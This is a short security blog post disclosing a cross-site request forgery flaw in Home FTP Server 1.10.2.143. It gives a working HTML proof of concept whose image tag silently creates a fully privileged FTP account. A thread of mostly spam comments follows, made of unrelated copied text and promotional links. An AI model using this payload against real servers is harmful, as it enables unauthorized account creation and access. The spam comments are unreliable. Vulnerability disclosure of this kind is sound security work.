This site is soon to be deprecated by http://www.johnleitch.net

Wednesday, May 26, 2010

Home FTP Server 1.10.2.143 Cross-site Request Forgery

A cross-site request forgery vulnerability in Home FTP Server 1.10.2.143 can be exploited via GET request to create an admin account with all permissions (read, write, delete, etc.)

PoC
<html>
<body>
    <img src="http://localhost/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" />
</body>
</html>
Posted by John Leitch at 2:17 PM
Labels: , , , , ,

12 comments:

  1. Sun FlowerNovember 9, 2011 at 10:43 PM

    Home FTP Server is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input by the Web interface. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a specially-crafted HTTP request to add or delete users. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.

    Passages Malibu Treatment
    ultralight backpacking gear

    ReplyDelete
  2. Sun FlowerNovember 16, 2011 at 6:23 PM

    Our interior decorators and designers prepare turnkey packages and provide entire project management support, from procurement and budget management to delivery and installation. Our clientele includes hotels, restaurants, financial institutions, corporate facilities and luxury homes.

    Modern interior designer
    install windows 8 from pendrive

    ReplyDelete
  3. Sun FlowerNovember 24, 2011 at 2:32 AM

    They provide you with enzymes, soluble fibers and phenolics to keep you healthy. The phenolics increase the amount of good bacteria in your gut and reduce the amount of the harmful ones, restoring the natural balance.

    indvendige dvre
    e cigarette

    ReplyDelete
  4. quanDecember 19, 2011 at 11:33 PM

    hotels in edinburghSki ModeFollowing Dumbledore's death, Voldemort completes his ascension to power and gains control of the Ministry of Magic. Harry, Ron, and Hermione leave Hogwarts to hunt and destroy Voldemort's remaining horcruxes. They isolate themselves to ensure their friends and families' safety. They have little knowledge about the remaining horcruxes except the possibility that two are objects once belonging to Hogwarts founders Rowena Ravenclaw and Helga Hufflepuff, and the third may be Nagini, Voldemort's snake familiar. The whereabouts of the two founders' objects is unknown, and Nagini is presumed to

    ReplyDelete
  5. cinderellaMarch 12, 2012 at 4:26 AM

    For the purposes of business, trade and diplomacy widespread the English language. But some say the country is still many local languages ​​- Bengali, Marathi, Tamil, Urdu, Sanskrit дърводелски услуги

    ReplyDelete
  6. 25251325March 22, 2012 at 2:05 PM

    text onlineDownload GamesRamanantsoa was a member of the Merina ethnic group, and came from a wealthy family. He was a career officer in the French army. After Madagascar became independent, he joined the Madagascar military, rising to the rank of Major General. In May 1972, amidst massive political protests.

    ReplyDelete
  7. yeu_yeuApril 2, 2012 at 2:26 PM

    replicas de relogios Cartier

    Phen375Southeast Asians are predominant in the western half of North York. Vietnamese cultural groups can be found all over North York. There is also a growing Cambodian population concentrated in the Jane and Finch community. The neighbourhood with the largest percentage of Southeast Asians in North York is the Grassways-Eddystone area in Jane and Finch with 18%.

    ReplyDelete
  8. yeu_yeuApril 8, 2012 at 12:39 PM

    while influential historian Robert Chambers accepted that the legend could potentially be true but believed it unlikely. Throughout most of the 19th century little research was carried out into the origins of the legend. Despite the doubts among historians, in the 19th century the legend became increasingly popular and the village of Biddenden was thronged with rowdy visitors every Easter. cosmetic dentist dublin

    cartoon vector illustration

    ReplyDelete
  9. yeu_yeuApril 16, 2012 at 1:59 PM

    All members of the executive and legislative branches are directly elected.[164][165][166] Judges and other judicial officials are appointed after passing entry exams.[164] Brazil has a multi-party system for most of its history. Voting is compulsory for the literate between 18 and 70 years old and optional for illiterates and those between 16 and 18 or beyond 70.
    Ionic Cleanse

    psicologia las rozas

    ReplyDelete
  10. HieuThaoApril 27, 2012 at 10:06 PM

    braces dublin

    relogios replicas
    you are invited to follow my blog
    Very nice sitcom to watch online. Funny and entertaining.

    ReplyDelete
  11. aloaloApril 29, 2012 at 2:39 PM

    Dative - memorised as "to or for": used when the noun is the indirect object of the sentence, with special verbs, with certain prepositions, and if used as agent, reference, or even possessor. (e.g., The merchant hands over the stola to the woman. Mercator feminae stolam tradit.
    com domain

    florida web design

    ReplyDelete
  12. aloaloMay 1, 2012 at 4:34 AM

    This comment has been removed by the author.

    ReplyDelete

Subscribe to: Post Comments (Atom)